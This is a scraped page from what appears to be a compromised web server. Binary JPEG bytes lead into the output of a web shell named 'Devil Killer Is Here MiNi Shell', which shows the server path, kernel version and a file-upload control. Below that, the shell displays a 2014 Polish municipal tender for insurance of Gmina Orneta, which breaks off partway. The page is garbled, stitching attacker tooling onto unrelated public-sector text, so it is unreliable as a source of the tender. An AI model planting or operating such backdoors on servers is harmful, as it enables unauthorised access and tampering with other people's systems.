JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141114/375052-N-2014.html

<p class="kh_header"><b>Orneta: Kompleksowe ubezpieczenie Gminy Orneta  i  Towarzystwa Budownictwa Społecznego Administrator spółka z o.o. w Ornecie</b><br>
<b>Numer ogłoszenia: 375052 - 2014; data zamieszczenia: 14.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe ubezpieczenie Gminy Orneta  i  Towarzystwa Budownictwa Społecznego Administrator spółka z o.o. w Ornecie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  Kompleksowe ubezpieczenie Gminy Orneta i Towarzystwa Budownictwa Społecznego Administrator Spółka z o.o. w Ornecie.
1) Przedmiot zamówienia został podzielony na trzy (3) części  tj. 
a)Część 1 - Zadanie 1:  Ubezpieczenie mienia,  odpowiedzialności cywilnej  i osób Gminy Orneta  wraz z jednostkami organizacyjnymi  wg  Załącznika nr 1 SOPZ Rozdziału III  SIWZ
b)Część 2 - Zadanie 2:  Ubezpieczenie pojazdów mechanicznych Gminy Orneta  wraz z jednostkami organizacyjnymi  wg  Załącznika nr 2 SOPZ Rozdziału III SIWZ 
c)Część 3 - Zadanie 3: Ubezpieczenie mienia i  odpowiedzialności cywilnej  TBS    
Administrator spółki z o.o. w Ornecie  i wspólnot  mieszkaniowych wg  Załącznika nr 3 SOPZ Rozdziału III SIWZ 
2) Zamawiający dopuszcza możliwość składania ofert częściowych na dowolną liczbę 
wybranych przez Wykonawcę części przedmiotu zamówienia.
3) Warunki składania ofert częściowych zostały określone w § 18 IDW Rozdziału I SIWZ  
2.Zakres przedmiotu zamówienia wg załącznika nr 1 do niniejszego ogłoszenia 
3.Szczegółowy opis przedmiotu zamówienia  dla Części 1 , 2 i 3 przedmiotu zamówienia został przedstawiony w Rozdziale III niniejszej SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1  pkt 6  ustawy Pzp . 
2.Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego. 
3.Zamówienia uzupełniające dotyczyć będą  ryzyk ubezpieczeniowych wymienionych w zamówieniu podstawowym. 
4.Zamówienia uzupełniające mogą dotyczyć  również przedłużenia terminu realizacji zamówienia (okresu ubezpieczenia).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.51.00-4, 66.51.52.00-5, 66.51.54.00-7, 66.51.54.10-0, 66.51.60.00-0, 66.51.64.00-4, 66.51.41.10-0, 66.51.61.00-1, 66.51.93.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca  wykaże, że:
- posiada zezwolenie na wykonywanie działalności ubezpieczeniowej , o którym mowa w art. 6 ust. 1 ustawy z dnia 22 maja 2003r. o działalności ubezpieczeniowej (tekst jednolity:  Dz. U. z 2013r., poz. 950 ze zm.) w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia  
Ocena spełnienia warunku  nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 1 i 2  IDW tj 
-   oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ
-   aktualnego zezwolenia właściwego organu na  prowadzenie działalności  
ubezpieczeniowej, o którym mowa w art. 6 ust. 1 ustawy z   dnia  22 maja 2003 roku o działalności ubezpieczeniowej (tekst jednolity:  Dz. U. z 2013 r. poz. 950 ze zm.) w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia, 
lub gdy zezwolenie nie jest wymagane na podstawie odrębnych przepisów zaświadczenia właściwego organu, że wykonawca  prowadzi  działalność  ubezpieczeniową obejmującą przedmiot zamówienia 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zgodnie z  § 2 ust. 3 rozporządzenia Prezesa Rady Ministrów z dnia 19  lutego 2013r. w  sprawie rodzajów dokumentów, jakich może żądać Zamawiający  od  Wykonawcy oraz  form, w  jakich te dokumenty  mogą być składane (Dz. U. z 2013r. poz. 231) zamiast dokumentów  o których mowa powyżej składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce zamieszkania lub siedzibę,  potwierdzające odpowiednio, że posiada uprawnienia do wykonywania  działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW  
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 3 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz Oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ
2)Formularz Cenowy sporządzony zgodnie z § 12 IDW Rozdziału I SIWZ wg  Załącznika nr 2 do  IDW Rozdziału II SIWZ  
3)  Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru, a w przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
4)Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć 
podwykonawcom   według Załącznika nr 5 do IDW Rozdziału II SIWZ
5) Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa  w rozumieniu przepisów o  zwalczaniu nieuczciwej konkurencji  sporządzone wg Załącznika nr 6 do IDW Rozdziału II SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Klauzule dodatkowe fakultatywne - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia  publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru  Wykonawcy.      
2.Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian   zawartej umowy:
1)zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy;
2)zmiany formy prawnej prowadzonej działalności gospodarczej;
3)w przypadku gdy zmiana jest korzystna dla Zamawiającego np. zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy oraz wprowadzenia nowych klauzul   za zgodą Zamawiającego i Wykonawcy bez dodatkowej zwyżki ubezpieczenia;
4)zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego podlegających ubezpieczeniu i ich formy prawnej  w przypadku:
a)powstania nowych jednostek (w wyniku utworzenia, połączenia lub          wyodrębniania) -  składka będzie rozliczana bądź naliczana zgodnie z  określonymi w  
SIWZ  zapisami klauzuli warunków i taryf;
b)przekształcenia jednostki - warunki ubezpieczenia będą nie gorsze jak dla 
jednostki  pierwotnej; 
c)likwidacji jednostki - jednostka zostanie wyłączona z ochrony ubezpieczeniowej, 
a jeżeli jej mienie zostanie przekazane innym jednostkom organizacyjnym 
Zamawiającego, to zostanie ono objęte ochroną przez Wykonawcę na  warunkach  
ubezpieczenia nie gorszych jak dla jednostki zlikwidowanej.
d)włączenia dodatkowych jednostek do ubezpieczenia w okresie realizacji  
zamówienia, na wniosek Zamawiającego i za zgodą Wykonawcy - dotyczy to  
jednostek, które nie były wykazane do ubezpieczenia w chwili udzielenia zamówienia 
publicznego Wykonawcy;
5)zmianę umowy w przypadku zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego
6)wystąpią zmiany stanu faktycznego, które powodować będą konieczność rozszerzenia danego  ubezpieczenia określonego w SIWZ lub spowodują niezasadność danego ubezpieczenia przewidzianego w SIWZ (np. zmiana w zakresie działalności, liczbie osób, sprzedaż lub zakup  pojazdu mechanicznego),
7)nastąpią zmiany w mieniu Ubezpieczającego, które skutkować będą koniecznością skorygowania sum ubezpieczenia lub limitów podanych w SIWZ.
8)zmiany dotyczące terminów płatności, wysokości i liczby rat składki; w przypadku braku środków na zapłatę składek przez jednostki Zamawiającego w terminie przewidzianym w umowie oraz dokumentach ubezpieczenia, bez dodatkowej zwyżki wysokości składki przy rozłożeniu jej na raty, na pisemny wniosek Zamawiającego złożony przed upływem terminu płatności składki przewidzianym w umowie oraz dokumentach ubezpieczenia po uprzedniej zgodzie Wykonawcy;
9)wykonanie zamówienia lub jego części w określonym pierwotnie terminie nie leży w interesie Zamawiającego, czego nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia;
10)zmiany wysokości składki w przypadku zmiany: 
a)stawki podatku od towarów i usług
b) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
c)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości składki na ubezpieczenie społeczne lub zdrowotne
-  jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;
11)zmiany wysokości składki lub raty składki w ubezpieczeniach majątkowych w przypadku zmiany sumy ubezpieczenia - w przypadku zmiany wartości majątku w okresie ubezpieczenia oraz w wyniku nabycia składników majątkowych w okresie pomiędzy zebraniem danych a rozpoczęciem okresu ubezpieczenia. Składka będzie rozliczana zgodnie z, określonymi w SIWZ zapisami klauzuli warunków i taryf oraz klauzul automatycznego pokrycia; 
12)zmiany wysokości składki lub raty składki w ubezpieczeniu odpowiedzialności cywilnej i ubezpieczeniach na zawartych w systemie na pierwsze ryzyko w wyniku podwyższenia wysokości sumy gwarancyjnej i zmiany limitów odpowiedzialności. Składka będzie rozliczana zgodnie z, określonymi w SIWZ zapisami klauzuli warunków i taryf; 
13)zmiany wysokości składki w ubezpieczeniu mienia od wszystkich ryzyk w przypadku zmiany sumy ubezpieczenia budynków i budowli w przypadku zmiany rodzaju wartości budynku/budowli (np. z wartości księgowej brutto na wartość odtworzeniową). Składka będzie rozliczana zgodnie z, określonymi w SIWZ zapisami klauzuli warunków i taryf; 
14)zmiany wysokości składki w ubezpieczeniach komunikacyjnych w przypadku zmiany sumy ubezpieczenia w ubezpieczeniu autocasco oraz w przypadku ubezpieczenia pojazdów nabywanych przez Zamawiającego (jednostki Zamawiającego) w trakcie trwania umowy o udzielenie zamówienia publicznego oraz sprzedaży lub likwidacji pojazdów przez Zamawiającego (jednostki Zamawiającego) i zmiany posiadacza pojazdów w tym okresie.
3.Niezależnie od powyższych zmian, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych stron ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu Umowy.
W takiej sytuacji, Zamawiający i Wykonawca wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe jego brzmienie bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2014 godzina 12:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Sekretariat pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1:  Ubezpieczenie mienia,  odpowiedzialności cywilnej  i osób Gminy  Orneta  wraz z jednostkami organizacyjnymi  wg  Załącznika nr 1  SOPZ Rozdziału III  SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia dla Części 1 - Zadanie 1:  Ubezpieczenie mienia,  odpowiedzialności cywilnej  i osób Gminy  Orneta  wraz z jednostkami organizacyjnymi  wg  Załącznika nr 1  SOPZ Rozdziału III  SIWZ obejmuje:
a)Ubezpieczenie od odpowiedzialności cywilnej
b)Ubezpieczenie mienia od wszystkich ryzyk
c)Ubezpieczenie sprzętu elektronicznego od wszystkich ryzyk
d)Ubezpieczenie Następstw Nieszczęśliwych wypadków
2.Szczegółowy opis przedmiotu zamówienia  dla Części 1 przedmiotu zamówienia został przedstawiony w Załączniku nr 1 SOPZ Rozdziału III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.50.00-3, 66.51.51.00-4, 66.51.52.00-5, 66.51.54.00-7, 66.51.54.10-0, 66.51.60.00-0, 66.51.64.00-4, 66.51.93.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Klauzule dodatkowe fakultatywne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2:  Ubezpieczenie pojazdów mechanicznych Gminy Orneta  wraz   z jednostkami organizacyjnymi  wg  Załącznika nr 2 SOPZ Rozdziału III  SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiotu zamówienia dla Części 2 - Zadanie 2:  Ubezpieczenie pojazdów mechanicznych Gminy Orneta  wraz   z jednostkami organizacyjnymi  wg  Załącznika nr 2 SOPZ Rozdziału III  SIWZ obejmuje: 
a)Ubezpieczenie komunikacyjne (OC, AC, NNW)
2. Szczegółowy opis przedmiotu zamówienia  dla Części 2 przedmiotu zamówienia został przedstawiony w Załączniku nr 2 SOPZ Rozdziału III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.21.00-3, 66.51.41.10-0, 66.51.61.00-1, 66.51.93.00-4.</p></li>
